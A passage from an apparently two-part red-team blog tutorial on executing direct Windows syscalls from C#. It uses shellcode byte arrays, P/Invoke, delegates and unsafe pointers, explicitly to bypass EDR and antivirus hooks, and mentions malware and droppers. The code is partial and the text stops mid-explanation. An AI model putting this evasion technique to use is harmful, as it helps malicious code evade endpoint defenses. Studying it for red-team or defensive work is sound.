Alright, so we know how system calls work, and how they are structured, but now you might be asking yourself… How do we execute these system calls?

It’s simple really. For us to directly invoke the system call, we will build the system call using assembly and execute that in our applications memory space! This will allow us to bypass any hooked function that are being monitored by EDR’s or Anti-Virus. Of course syscalls can still be monitored and executing syscalls via C# still gives off a few hints - but let’s not worry about that as it’s not in scope for this blog post.

For example, if we wanted to write a program that utilizes the NtCreateFile syscall, we can build some simple assembly like so:

mov r10, rcx
mov eax, 0x55 <-- NtCreateFile Syscall Identifier
syscall
ret

Alright, so we have the assembly of our syscall… now what? How do we execute it in C#?

Well in C++ this would be as simple as adding this to a new .asm file, enabling the masm build dependency, defining the C function prototype of our assembly, and simply just initialize the variables and structures needed to invoke the syscall.

As easy as that sounds, it’s not that simple in C#. Why? Two words - Managed Code.

Understanding C# and the .NET Framework

Before we dive any deeper into understanding what this β€œManaged Code” is and why it’s going to cause us headaches - we need to understand what C# is and how it runs on the .NET Framework.

Simply, C# is a type-safe object-oriented language that enables developers to build a variety of secure and robust applications. It’s syntax simplifies many of the complexities of C++ and provides powerful features such as nullable types, enumerations, delegates, lambda expressions, and direct memory access. C# also runs on the .NET Framework, which is an integral component of Windows that includes a virtual execution system called the Common Language Runtime or CLR and a unified set of class libraries. The CLR is the commercial implementation by Microsoft of the Common Language Infrastructure known as the CLI.

Source code written in C# is compiled into an Intermediate Language (IL) that conforms to the CLI specification. The IL code and resources, such as bitmaps and strings, are stored on disk in an executable file called an assembly, typically with an extension of .exe or .dll.

When a C# program is executed, the assembly is loaded into the CLR, the CLR then performs Just-In-Time (JIT) compilation to convert the IL code to native machine instructions. The CLR also provides other services such automatic garbage collection, exception handling, and resource management. Code that’s executed by the CLR is sometimes referred to as β€œmanaged code”, in contrast to β€œunmanaged code”, which is compiled directly into native machine code for a specific system.

To put it very simply, managed code is just that: code whose execution is managed by a runtime. In this case, the runtime is the Common Language Runtime

In therms of unmanaged code, it simply relates to C/C++ and how the programmer is in charge of pretty much everything. The actual program is, essentially, a binary that the operating system loads into memory and starts. Everything else, from memory management to security considerations are a burden of the programmer.

A good visual example of the the .NET Framework is structured and how it compiles C# to IL then to machine code can be seen below.

Now, if you actually read all that then you would have noticed that I mentioned that the CLR provides other services such as β€œgarbage collection”. In the CLR, the garbage collector also known as the GC, serves as the automatic memory manager by essentially… you know, β€œfreeing the garbage” that is your used memory. It also gives the benefit by allocating objects on the managed heap, reclaiming objects, clearing memory, and proving memory safety by preventing known memory corruption issues like Use After Free.

Now while C# is a great language, and it provides some amazing features and interoperability with Windows - like in-memory execution and as such - it does have a few caveats and downsides when it comes to coding malware or trying to interact with the system. Some of these issues are:

  1. It’s easy to disassemble and reverse engineer C# assemblies via tools like dnSpy all because they are compiled into IL and not native code.
  2. It requires .NET to be present on the system for it to execute.
  3. It’s harder to do anti-debugging tricks in .NET then in native code.
  4. It requires more work and code to interoperate (interop) between managed and unmanaged code.

In case of this blog post, #4 is the one that will cause us the most pain when coding syscalls in C#.

Whatever we do in C# is β€œmanaged” - so how are we able to efficiently interact with the Windows system and processor?

This questions is especially important for us since we want to execute assembly code, and unfortunately for us, there is no inline ASM in C# like there is in C++ with the masm build dependencies.

Well, thankfully for us, Microsoft provided a way for us to be able to do that! And it’s all thanks to the CLR! Thanks to how the CLR was constructed, it actually allows us to pass the boundaries between the managed and unmanaged world. This process is known as interoperability or interop for short. With interop, C# supports pointers and the concept of β€œunsafe” code for those cases in which direct memory access is critical - that would be us! πŸ˜‰

Overall this means that we can now do the same things C++ can, and we can also utilize the same windows API functions… but, with some major - I mean… minor headaches and inconveniences… heh. πŸ˜…

Of course, it is important to note that once the code passes the boundaries of the runtime, the actual management of the execution is again in the hands of unmanaged code, and thus falls under the same restrictions as it would when we code in C++. Thus we need be be careful on how we allocate, deallocate, and manage memory as well as other objects.

So, knowing this, how are we able to enable this interoperability in C#? Well, let me introduce you the person of the hour - P/Invoke (short for Platform Invoke)!

Understanding Native Interop via P/Invoke

P/Invoke is a technology that allows you to access structs, callbacks, and functions in unmanaged libraries (meaning DLLs and such) from your managed code. Most of the P/Invoke API that allows this interoperability is contained within two namespaces - specifically System and System.Runtime.InteropServices.

So let’s see a simple example. Let’s say you wanted to utilize the MessageBox function in your C# code - which usually you can’t call unless you’re building a UWP app.

For starters, let’s create a new .cs file and make sure we include the two P/Invoke namespaces.

using System;
using System.Runtime.InteropServices;

public class Program
{
    public static void Main(string[] args)
    {
        // TODO
    }
}

Now, let’s take a quick look at the C MessageBox syntax that we want to use.

int MessageBox(
  HWND    hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT    uType
);

Now for starters you must know that the data types in C++ do not match those used in C#. Meaning, that data types such as HWND (handle to a window) and LPCTSTR (Long Pointer to Constant TCHAR String) are not valid in C#.

We’ll brief over converting these data types for MessageBox now so you get a brief idea - but if you want to learn more then I suggest you go read about the C# Types and Variables.

So for any handle objects related to C++, such as HWND, the equivalent of that data type (and any pointer in C++) in C# is the IntPtr Struct which is a platform-specific type that is used to represent a pointer or a handle.

Any strings or pointer to string data types in C++ can be set to the C# equivalent - which simply is string. And for UINT or unsigned integer, that stays the same in C#.

Alright, now that we know the different data types, let’s go ahead and call the unmanaged MessageBox function in our code.

Our code should now look something like this.

using System;
using System.Runtime.InteropServices;

public class Program
{
    [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    private static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    public static void Main(string[] args)
    {
        // TODO
    }
}

Take note that before we import our unmanaged function, we call the DllImport attribute. This attribute is crucial to add because it tells the runtime that it should load the unmanaged DLL. The string passed in, is the target DLL that we want to load - in this case user32.dll which houses the function logic of MessageBox.

Additionally, we also specify which character set to use for marshalling the strings, and also specify that this function calls SetLastError and that the runtime should capture that error code so the user can retrieve it via Marshal.GetLastWin32Error() to return any errors back to us if the function was to fail.

Finally, you see that we create a private and static MessageBox function with the extern keyword. This extern modifier is used to declare a method that is implemented externally. Simply this tells the runtime that when you invoke this function, the runtime should find it in the DLL specified in DllImport attribute - which in our case will be in user32.dll.

Once we have all that, we can finally go ahead and call the MessageBox function within our main program.

using System;
using System.Runtime.InteropServices;

public class Program
{
    [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    private static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    public static void Main(string[] args)
    {
        MessageBox(IntPtr.Zero, "Hello from unmanaged code!", "Test!", 0);
    }
}

If done correctly, this should now execute a new message box with the title β€œTest!” and a message of β€œHello from unmanaged code!”.

Awesome, so we just learned how to import and invoke unmanaged code from C#! It’s actually pretty simple when you look at it… but don’t let that fool you!

This was just a simple function - what happens if the function we want to call is a little more complex, such as the CreateFileA function?

Let’s take a quick look at the C syntax for this function.

HANDLE CreateFileA(
  LPCSTR                lpFileName,
  DWORD                 dwDesiredAccess,
  DWORD                 dwShareMode,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  DWORD                 dwCreationDisposition,
  DWORD                 dwFlagsAndAttributes,
  HANDLE                hTemplateFile
);

Let’s look at the dwDesiredAccess parameter which specifies the access permissions of the file we created by using generic values such as GENERIC_READ and GENERIC__WRITE. In C++ we could simply just use these values and the system will know what we mean, but not in C#.

Upon looking into the documentation we will see that Generic Access Rights used for the dwDesiredAccess parameter use some sort of Access Mask Format to specify what privilege we are to give the file. Now since this parameter accepts a DWORD which is a 32-bit unsigned integer, we quickly learn that the GENERIC-* constants are actually flags which match the constant to a specific access mask bit value.

In the case of C#, to do the same, we would have to create a new structure type with the FLAGS enumeration attribute that will contain the same constants and values that C++ has for this function to work properly.

Now you might be asking me - where would I get such details? Well the best resource for you to utilize in this case - and any case where you have to deal with unmanaged code in .NET is to use the PInvoke Wiki. You’ll pretty much find anything and everything that you need here.

If we were to invoke this unmanaged function in C# and have it work properly, a sample of the code would look something like this:

using System;
using System.Runtime.InteropServices;

public class Program
{
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern IntPtr CreateFile(
        string lpFileName,
        EFileAccess dwDesiredAccess,
        EFileShare dwShareMode,
        IntPtr lpSecurityAttributes,
        ECreationDisposition dwCreationDisposition,
        EFileAttributes dwFlagsAndAttributes,
        IntPtr hTemplateFile);

    [Flags]
    enum EFileAccess : uint
    {
        Generic_Read = 0x80000000,
        Generic_Write = 0x40000000,
        Generic_Execute = 0x20000000,
        Generic_All = 0x10000000
    }

    public static void Main(string[] args)
    {
        // TODO Code Here for CreateFile
    }
}

Now do you see what I meant when I said that utilizing unmanaged code in C# can be cumbersome and inconvenient? Good, so we’re on the same page now 😁

Alright, so we’ve covered a lot of material already. We understand how system calls work, we know how C# and the .NET framework function on a lower level, and we now know how to invoke unmanaged code and Win32 APIs from C#.

But, we’re still missing a critical piece of information. What could that be… πŸ€”

Oh, that’s right! Even though we can call Win32 API functions in C#, we still don’t know how to execute our β€œnative code” assembly.

Well, you know what they say - β€œIf there’s a will, then there’s a way”! And thanks to C#, even though we can’t execute inline assembly like we can in C++, we can do something similar thanks to something lovely called Delegates!

Understanding Delegates and Native Code Callbacks

Can we just stop for a second and actually admire how cool the CLR really is? I mean to manage code, and to allow interop between the GC and the Windows APIs is actually pretty cool.

The runtime is so cool, that it also allows communication to flow in both directions, meaning that you can call back into managed code from native functions by using function pointers! Now, the closest thing to a function pointer in managed code is a delegate, which is a type that represents references to methods with a particular parameter list and return type. And this is what is used to allow callbacks from native code into managed code.

Simply, delegates are used to pass methods as arguments to other methods. Now the use of this feature is similar to how one would go from managed to unmanaged code. A good example of this can be seen given by Microsoft.

using System;
using System.Runtime.InteropServices;

namespace ConsoleApplication1
{
    public static class Program
    {
        // Define a delegate that corresponds to the unmanaged function.
        private delegate bool EnumWindowsProc(IntPtr hwnd, IntPtr lParam);

        // Import user32.dll (containing the function we need) and define
        // the method corresponding to the native function.
        [DllImport("user32.dll")]
        private static extern int EnumWindows(EnumWindowsProc lpEnumFunc, IntPtr lParam);

        // Define the implementation of the delegate; here, we simply output the window handle.
        private static bool OutputWindow(IntPtr hwnd, IntPtr lParam)
        {
            Console.WriteLine(hwnd.ToInt64());
            return true;
        }

        public static void Main(string[] args)
        {
            // Invoke the method; note the delegate as a first parameter.
            EnumWindows(OutputWindow, IntPtr.Zero);
        }
    }
}

So this code might look a little complex, but trust me - it’s not! Before we walk though this example, let’s make sure we review the signatures of the unmanaged functions that we need to work with.

As you can see, we are importing the native code function EnumWindows which enumerates all top-level windows on the screen by passing the handle to each window, and in turn, passing it to an application-defined callback function.

If we take a peek at the C syntax for the function type we will see the following:

BOOL EnumWindows(
  WNDENUMPROC lpEnumFunc,
  LPARAM      lParam
);

If we look at the lpEnumFunc parameter in the documentation, we will see that it accepts a pointer to an application-defined callback - which should follow the same structure as the EnumWindowsProc callback function. This callback is simply a placeholder name for the application-defined function. Meaning that we can call it anything we want in the application.

If we take a peek at this function C syntax we will see the following.

BOOL CALLBACK EnumWindowsProc(
  _In_ HWND   hwnd,
  _In_ LPARAM lParam
);

As you can see this function parameters accept a HWND or pointer to a windows handle, and a LPARAM or Long Pointer. And the return value for this callback is a boolean - either true or false to dictate when enumeration has stopped.

Now, if we look back into our code, on line #9, we define our delegate that matches the signature of the callback from unmanaged code. Since we are doing this in C#, we replaced the C++ pointers with IntPtr - which is the the C# equivalent of pointers.

On lines #13 and #14 we introduce the EnumWindows function from user32.dll.

Next on line #17 - 20 we implement the delegate. This is where we actually tell C# what we want to do with the data that is returned to us from unmanaged code. Simply here we are saying to just print out the returned values to the console.

And finally, on line #24 we simply call our imported native method and pass our defined and implemented delegate to handle the return data.

Simple!

Alright, so this is pretty cool. And I know… you might be asking me right now - β€œJack, what’s this have to do with executing our native assembly code in C#? We still don’t know how to accomplish that!”

And all I have to say for myself is this meme…

There’s a reason why I wanted to teach you about delegates and native code callbacks before we got here, as delegates are a very important part to what we will cover next.

Now, we learned that delegates are similar to C++ function pointers, but delegates are fully object-oriented, and unlike C++ pointers to member functions, delegates encapsulate both an object instance and a method. We also know that they allow methods to be passed as parameters and can also be used to define callback methods.

Since delegates are so well versed in the data they can accept, there’s something cool that we can do with all this data.

For example, let’s say we execute a native windows function such as VirtualAlloc which allows us to reserve, commit, or change the state of a region of pages in the virtual address space of the calling process. This function will return to us a base address of the allocated memory region.

Let’s say, for this example, that we allocated some… oh you know… shellcode per say 😏- see where I’m going with this? No!? Fine… let me explain.

So if we were able to allocate a memory region in our process that contained shellcode and returned that to our delegate, then we can utilize something called type marshaling to transform incoming data types to cross between managed and native code. This means that we can go from an unmanaged function pointer to a delegate! Meaning that we can execute our assembly or byte array shellcode this way!

So with this general idea, let’s jump into this a little deeper!

Type Marshaling & Unsafe Code and Pointers

As stated before, Marshaling is the process of transforming types when they need to cross between managed and native code. Marshaling is needed because the types in the managed and unmanaged code are different as we’ve already seen and demonstrated.

By default, the P/Invoke subsystem tries to do type marshaling based on the default behavior. But, for those situations where you need extra control with unmanaged code, you can utilize the Marshal class for things like allocating unmanaged memory, copying unmanaged memory blocks, and converting managed to unmanaged types, as well as other miscellaneous methods used when interacting with unmanaged code.

A quick example of how this marshaling works can be seen below.

In our case, and for this blog post, the most important Marshal method will be the Marshal.GetDelegateForFunctionPointer method, which allows us to convert an unmanaged function pointer to a delegate of a specified type.

Now there are a ton of other types you can marshal to and from, and I highly suggest you read up on them as they are a very integral part of the .NET framework and will come in handy whenever you write red team tools, or even defensive tools if you are a defender.

Alright, so we know that we can marshal our memory pointers to delegates - but now the question is, how are we able to create a memory pointer to our assembly data? Well in fact, it’s quite easy. We can do some simple pointer arithmetic to get a memory address of our ASM code.

Since C# does not support pointer arithmetic, by default, what we can do is declare a portion of our code to be unsafe. This simply denotes an unsafe context, which is required for any operation involving pointers. Overall, this allows us to carry out pointer operations such as doing pointer dereferencing.

Now the only caveat is that to compile unsafe code, you must specify the -unsafe compiler option.

So knowing this, let’s go over a quick example.

If we wanted to - let’s say - execute the syscall for NtOpenProcess, what we would do is start by writing the assembly into a byte array like so.

using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

namespace SharpCall
{
    class Syscalls
    {

        static byte[] bNtOpenProcess =
        {
            0x4C, 0x8B, 0xD1,               // mov r10, rcx
            0xB8, 0x26, 0x00, 0x00, 0x00,   // mov eax, 0x26 (NtOpenProcess Syscall)
            0x0F, 0x05,                     // syscall
            0xC3                            // ret
        };
    }
}

Once we have our byte array completed for our syscall, we would then proceed to call the unsafe keyword and denote an area of code where unsafe context will occur.

Within that unsafe context, we can do some pointer arithmetic to initialize a new byte pointer called ptr and set that to the value of syscall, which houses our byte array assembly. As you will see below, we utilize the fixed statement, which prevents the garbage collector from relocating a movable variable - or in our case the syscall byte array.

Without a fixed context, garbage collection could relocate the variables unpredictably and cause errors later down the line during execution.

Afterwards, we simply cast the byte array pointer into a C# IntPtr called memoryAddress. Doing this will allow us to obtain the memory location of where our syscall byte array is located.

From here we can do multiple things like use this memory region in a native API call, or we can pass it to other managed C# functions, or we can even use it in delegates!

An example of what I explained above can be seen below.

using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

namespace SharpCall
{
    class Syscalls
    {
		// NtOpenProcess Syscall ASM
        static byte[] bNtOpenProcess =
        {
            0x4C, 0x8B, 0xD1,               // mov r10, rcx
            0xB8, 0x26, 0x00, 0x00, 0x00,   // mov eax, 0x26 (NtOpenProcess Syscall)
            0x0F, 0x05,                     // syscall
            0xC3                            // ret
        };

        public static NTSTATUS NtOpenProcess(
            // Fill NtOpenProcess Paramters
            )
        {
            // set byte array of bNtOpenProcess to new byte array called syscall
            byte[] syscall = bNtOpenProcess;

            // specify unsafe context
            unsafe
            {
                // create new byte pointer and set value to our syscall byte array
                fixed (byte* ptr = syscall)
                {
                    // cast the byte array pointer into a C# IntPtr called memoryAddress
                    IntPtr memoryAddress = (IntPtr)ptr;
                }
            }
        }
    }
}

And that about does it!

We now know how we can take shellcode from a byte array and execute it within our C# application by using unmanaged code, unsafe context, delegates, marshaling and more!

I know this was a lot to cover, and honestly it’s a little complex at first - so take your time to read this though and make sure you understand the concepts.

In our next blog post, we will focus on actually writing the code to execute a valid syscall by utilizing everything that we learned here! In addition to writing the code, we’ll also go over some concepts to managing your β€œtools” code and how we can prepare it for future integration between other tools.

Thanks for reading, and stay tuned for Part 2!

Red Team Tactics: Utilizing Syscalls in C# - Writing The Code

16 April 2020 at 00:00

In my previous post β€œRed Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge”, we covered some basic prerequisite concepts that we needed to understand before we could utilize syscalls in C#. We touched on some in-depth topics like windows internals and of course syscalls. We also went over how the .NET Framework functions and how we can utilize unmanaged code in C# to execute our syscall assemblies.

Now, if you haven’t read my previous post yet - then I highly recommend that you do so. Otherwise you might be lost and totally unfamiliar with some of the topics presented here. Of course, I’ll try to explain the best I can and provide links to external resources for some topics - but everything (mostly everything) that will be talked about here, is in the previous post! 😁

For today’s blog post, we will focus on actually writing the code to execute a valid syscall by utilizing everything that we learned. In addition to writing the code, we’ll also go over some concepts to managing our code so that we can prepare it for future integration between other tools. This integration idea will be similar to how SharpSploit by Ryan Cobb was developed to be integrated with other C# projects - but our’s won’t go to such an extent.

My initial idea for this part of the blog post was to walk you through developing an actual tool that we could use during operations - like Dumpert or SysWhispers. But after some consideration to how long and complex the blog post would get, I instead opted to code a simple PoC (Proof of Concept) demonstrating the execution of a single syscall.

I truly believe that after reading this blog post and going over the code example (which I will also post on GitHub), you’ll be able to code a tool on your own! I’ll also include a few links to tools that utilize the same syscall concepts in C# at the end of this post if you need more inspiration.

Who knows, maybe I’ll opt to do a live stream where we can all write a cool new tool together! 😏

Alright, with that out of the way, let’s open up Visual Studio or Visual Code, and get our hands dirty with some code!

Devising our Code and Class Structure

If there’s one thing that I learned when writing custom tools for red team operation - be it malware or some sort of implant - is that we need to organize our code and idea, and separate them into classes.

Classes are one of the most fundamental C#’s types. Simply, a class is a data structure that combines fields and methods (as well as other function members) in a single unit. Of course classes can be used as objects and support inheritance and polymorphism, which are mechanisms whereby our derived classes can extend and specialize other base classes.

Upon creation, these classes can then be utilized across our code base by adding the β€œusing” directive inside another source code file. This will then allow us to access our previous classes static members and nested types without having to qualify the access with the class name.

For example, let’s say we had a new class called β€œSyscalls” that housed our syscall logic. If we didn’t add the using directive to our C# code, then we would need to qualify our function with the full class name. So if our Syscalls class contained a syscall assembly for NtWriteFile, then to access that method inside another class, we would do something like Syscalls.NtWriteFile. Which is fine, but it get’s tiresome after a few times of calling the class repeatedly.

Now, some of you might ask - β€œWhy do we need this?”

Two reasons. One, it’s for organizational purposes and to keep our code β€œclean”. Two, it allows us to debug and fix issues in our code with ease instead of scrolling through a massive blob of text and trying to find the hide and seek champion known as the semicolon.

With that aside, let’s try being by organizing our code! For starters, let’s create an new project for a .NET Framework Console App and set it to use the 3.5 .NET Framework - like so.

Once completed, you should now have access to a new C# file called Program.cs. If we look at the right hand side of Visual Studio, we will notice that in our Solution Explorer we have the following solution structure.

+SharpCall SLN (Solution)
|
+->Properties
|
+->References
|
+->Program.cs (Main Program)

Our Program.cs file will house the main logic of our application. In the case of our PoC, we will want to call and utilize our syscalls in this file. As seen before, system calls occur within the CPU when the syscall instruction is called along with a valid syscall identifier. This instruction causes the CPU to switch from user mode to kernel mode to carry out certain privileged operations.

If we were to utilize just one syscall, then we could just simply included it in the Program.cs file. But, by doing so, we would cause ourselves some headaches if later down the line we decided to build this program out for either more modularity or flexibility to easier integrate with other applications - be that droppers or malware.

So we need to always think into the future - and to start, it would be a good idea to separate all our syscall assemblies into a separate file. This way, if the need was to arise for the integration of more syscalls, then we can just add them into one class and simply call the assemblies from our program.

And that’s exactly what we are going to do here! We’ll start by adding a new file inside our solution and call it Syscalls.cs. Our solution structure should now look similar to the following.

+SharpCall SLN (Solution)
|
+->Properties
|
+->References
|
+->Program.cs (Main Program)
|
+->Syscalls.cs (Class to Hold our Assembly and Syscall Logic)

Great, we can start coding now, right? Well not really - we’re forgetting one major thing here. Remember that since we’ll be using unmanaged code, we also need to instantiate the Windows API functions so that we can call them from our C# program . And to utilize unmanaged functions, we need to platform invoke (P/Invoke) their structs and parameters, as well as any other additional flag fields.

Again, we can do this in the Program.cs file, but it will be much more cleaner and organized if we did all the P/Invoke work in a separate class. So, let’s add another file to our solution and call it Native.cs - since it will house our β€œnative” windows functions.

Our solution structure should now look similar to the following:

+SharpCall SLN (Solution)
|
+->Properties
|
+->References
|
+->Program.cs (Main Program)
|
+->Syscalls.cs (Class to Hold our Assembly and Syscall Logic)
|
+->Native.cs (Class to Hold our Native Win32 APIs and Structs)

Now that we have our application organized, and know what goes where, we can finally start coding!

Writing our Syscall Code

Since this is a proof of concept, I will use the NtCreateFile system call to create a temporary file on our desktop. If we can get this to work then it’ll validate that our code logic is solid. Afterwards, we would then be able to focus on writing more complex tools and expanding our syscalls class with additional system calls.

Also, quick note - all of the code written below will only work on x64 systems and not x86.

Alright, to start, we need to get the assembly for our NtCreateFile syscall. As explained and detailed in my previous post, we can do so by utilizing WinDBG to disassemble and inspect the call function of NtCreateFile in ntdll.

Upon getting the memory address of the function, and dissembling the instructions at the memory address, we should now see the following output.

Upon looking at the disassembly, we see that our syscall identifier is 0x55. And if we look to the left of the assembly instructions, we’ll see the hexadecimal representation of our syscall instructions. Since there is no inline assembly in C#, we’re going to utilize these hexadecimal as shellcode, which will be added to a simply byte array.

We’ll do this by navigating to our Syscalls.cs file, and inside out syscalls class, we’ll create the new static byte array called bNtCreateFile - as shown.

Awesome, so we have our first syscall assembly completed! But how are we going to build out the code to execute this? Well, if you paid attention in my previous post then you would have learned about something called delegates.

Delegates are simply a type that represents references to methods with a particular parameter list and return type. When you instantiate a delegate, you can associate its instance with any method that has a compatible signature and return type. We can then can invoke our delegated method through the delegate instance.

This might sound a little confusing, but if you recall, in my last post we defined a new delegate called EnumWindowsProc and later defined the delegates implementation via OutputWindow. This implementation for the delegate simply told C# what we want to do with the data that is passed to this function reference - be it from managed or unmanaged code.

We can do the same thing here in our Syscall.cs class by defining a delegate to our unmanaged function - which in this case will be NtCreateFile. Once that delegate has been defined, we can go ahead and implement the logic that will handle transforming our syscall assembly to a valid function.

But let’s not get ahead of ourselves. First, we need to define the signature for our NtCreateFile delegate. To do so, we’ll start by creating a new public struct type called Delegates within our Syscall class.

This struct will house all our native functions (delegate) signature so they can be utilized by our syscalls.

Before we define our delegate, let’s take a look at the C syntax of NtCreateFile.

__kernel_entry NTSTATUS NtCreateFile(
  OUT PHANDLE           FileHandle,
  IN ACCESS_MASK        DesiredAccess,
  IN POBJECT_ATTRIBUTES ObjectAttributes,
  OUT PIO_STATUS_BLOCK  IoStatusBlock,
  IN PLARGE_INTEGER     AllocationSize,
  IN ULONG              FileAttributes,
  IN ULONG              ShareAccess,
  IN ULONG              CreateDisposition,
  IN ULONG              CreateOptions,
  IN PVOID              EaBuffer,
  IN ULONG              EaLength
);

After looking at the syntax, we quickly notice a few things that we haven’t seen before.

Fist of all, we notice that the NtCreateFile function has a return type of NTSTATUS which is a struct that contains an unsigned 32-bit integer for each message identifier. We also see that a few of the function parameters accept a set of different flags and structures, such as the ACCESS_MASK flags, OBJECT__ATTRIBUTES structure, and the IO_STATUS_BLOCK structure.

If we take a peek at the other function parameters like FileAttributes, and CreateOptions, we’ll see that they also accept specific flags.

So here lies the core problem of utilizing unmanaged code in C# - which is the fact that we need to manually create these flag enumerators and structures to contain the same value codes that Windows has. Otherwise if the parameters we pass into our syscall contain unexpected values, it will then cause the syscall to either break or return errors.

Thankfully for us, the P/Invoke wiki comes to the rescue. Here we can lookup how to implement our native functions, structs, and flags.

You can also use the Microsoft Reference Source website and search for the specific structures and access flags you need. These will be much closer to the original Windows references then what P/Invoke might have.

The following links should help us implement the necessary structures and flags needed to execute NtCreateFile with the proper parameter values:

Since these values, structures and flags are all β€œnative” to Windows, let’s go ahead and add them to the Native.cs file under the Native class.

After everything is implemented and cleaned up, part of your Native.cs file should look almost something like this.

As a side note - this is just a small subset of the implemented native structs and flags. If you want to see the full implementation, then take a look at the Native.cs file from the SharpCall project on my GitHub.

Also, take note on how we call the public keyword before each struct and flag enumerator. This is done so that we can access the objects from other files in our program.

Awesome, now that we have those implemented we can go ahead and convert the C++ data types of NtCreateFile to C# data types. After conversion your C# syntax should look like this:

NTSTATUS NtCreateFile(
  out Microsoft.Win32.SafeHandles.SafeFileHandle FileHadle,
  FileAccess DesiredAcces,
  ref OBJECT_ATTRIBUTES ObjectAttributes,
  ref IO_STATUS_BLOCK IoStatusBlock,
  ref long AllocationSize,
  FileAttributes FileAttributes,
  FileShare ShareAccess,
  CreationDisposition CreateDisposition,
  CreateOption CreateOptions,
  IntPtr EaBuffer,
  uint EaLength
);

Now, before we implement this structure as a delegate, let’s just brief over some of the converted data types.

As said before, usually any pointers or handles in C++ can be converted to an IntPtr in C#, but in this case you will notice that I converted the PHANDLE (a pointer to a handle) to be that of a SafeFileHandle data type. The reason we do this is because a SafeFileHandle represents a wrapper class for a file handle that C# will understand.

And since we are dealing with creating files and will be passing this data via delegates from managed to unmanaged code (and vice versa), we need to make sure that C# can handle and understand the data type it’s marshaling, otherwise we might encounter errors.

The rest should be self explanatory, as the FileAttributes, FileShare and those data types are simply a representation of the varaibles and values inside the structures and flag enumerators that we added to the Native class. This just tells C# that whenever data is passed into these parameters - be it a value or descriptor - then it needs to be referenced against that specific struct/flag enumerator.

A few others things you might have noticed is that I added the ref and out keywords to some of the parameters. Simply, these keywords indicate that arguments can to be passed by reference and not by value.

The difference between ref and out is that for the ref keyword, the parameter or argument must be initialized first before it is passed, unlike out where we don’t have to. The other difference is that for ref, data can be passed bi-directionally and any changes made to this argument in a method will be reflected in that variable when control returns to the calling method. For out, data is passed only in a unidirectional way and whatever value is returned to us by the calling method is set to the reference variable.

So in the case of NtCreateFile, we set the out keyword for FileHandle since this will be a pointer to a variable that receives the file handle if the call is successful. Which simply means that data is only being passed back β€œout” to us.

Makes sense? Good!

Now that we have this, we can finally add our C# syntax for NtCreateFile inside our newly added Delegates structure within our Syscalls class.

Once done, our Syscalls class should now look something like this.

NOTE: You might notice that I added using static SharpCall.Native at the top of the file. This simply tells C# to use the static class called Native. As explained before, we do this so we can directly use our native functions, struct and flag imports.

Alright, before we go on any further, take note that in the delegates structure, before we set up our NtCreateFile delegate, I’m calling the UnmanagedFunctionPointer attribute. This attribute controls the marshaling behavior of a delegate signature as an unmanaged function pointer when it’s passed to or from unmanaged code.

This is a critical piece of information that we need to include since we will be using unsafe code to marshal our unmanaged pointer from the syscall assembly to these function delegates - as explained in my previous post.

Awesome, we’re making some progress! Now that we have our structures, flag enumerators, and our function delegate defined, we can now go ahead and begin implementing the delegate to handle any parameters passed into it. These parameters will initially then be handled by our syscall assembly.

Let’s go ahead and create (or in other words instantiate) our NtCreateFile function delegate. We can do this directly after our syscall assembly.

Once done, your Syscalls.cs file should look similar to whats shown below.

The brackets with the TODO comment (right after our instantiated delegate) is where we will add the code to handle the data being passed to and from managed and unmanaged code.

If you recall from my last post, I explained how the Marshal.GetDelegateForFunctionPointer allows us to convert an unmanaged function pointer to a delegate of a specified type. By using that with the unsafe context, it would allow us to create a pointer to a memory location where our shellcode is located (which would be our syscall assembly) and will allow us to execute the assembly from managed code via the delegate.

We’ll be doing the same thing here. So for starters, let’s make sure that we create a new byte array called syscall and set it to the same value as our bNtCreateFile assembly. Once done, specify the unsafe context and add some brackets which will house our unsafe code.

Once completed your newly updated Syscalls.cs file should look similar to the following.

Now, just as I explained in my previous post - within that unsafe context, we will initialize a new byte pointer called ptr and set that to the value of syscall - which houses our byte array assembly.

As you will see below and as explained previously, we utilize the fixed statement for this pointer so that we can prevent the garbage collector from relocating our syscall byte array in memory.

Afterwards, we will simply cast the byte array pointer into an IntPtr called memoryAddress. Doing this will allow us to obtain the memory address of where our syscall byte array is located within our application during execution.

Upon doing the above, our updated Syscall.cs file should look like the one presented below.

Now for this part, I suggest you pay close attention as this is where the magic happens! πŸ˜‰

Since we now have (or will have) a memory address of where our syscall assembly is located during application execution, we need to do something to make sure that it will execute properly within it’s allocated memory region.

If you’re familiar with how shellcode works during exploit development - whenever we want to write, read, or even execute shellcode within our target process or targeted memory pages, then we need to make sure that those memory regions have proper access rights. If you’re unfamiliar with this, then go read about the how the Windows security model enables you to control process security and access rights.

For example, let’s see what kind of memory protections NtCreateFile has within notepad when it’s executing.

0:000> x ntdll!NtCreateFile
00007ffb`f6b9cb50 ntdll!NtCreateFile (NtCreateFile)
0:000> !address 00007ffb`f6b9cb50

Usage:                  Image
Base Address:           00007ffb`f6b01000
End Address:            00007ffb`f6c18000
Region Size:            00000000`00117000 (   1.090 MB)
State:                  00001000          MEM_COMMIT
Protect:                00000020          PAGE_EXECUTE_READ
Type:                   01000000          MEM_IMAGE
Allocation Base:        00007ffb`f6b00000
Allocation Protect:     00000080          PAGE_EXECUTE_WRITECOPY
Image Path:             ntdll.dll
Module Name:            ntdll
Loaded Image Name:      C:\Windows\SYSTEM32\ntdll.dll
Mapped Image Name:      
More info: lmv m ntdll More info: !lmi ntdll More info: ln 0x7ffbf6b9cb50 More info: !dh 0x7ffbf6b00000 Content source: 1 (target), length: 7b4b0

As shown above - notepad has Read and Execute permissions for NtCreatreFile within it’s processes virtual memory. The reason for this is that notepad needs to make sure that it can execute the syscall and also must be able to read the return values.

In my previous post I explained how each applications virtual address space is private, and how one application can’t alter the data that belongs to another application - unless the process makes part of its private address space available.

Now since we are using unsafe context in C#, and are passing boundaries between managed and unmanaged code - then we need to manage the memory access within our programs virtual memory space since the CLR won’t do that for us! And we need to do this so we can write our parameters to our syscall, execute the syscall, and also read the returned data for our delegate!

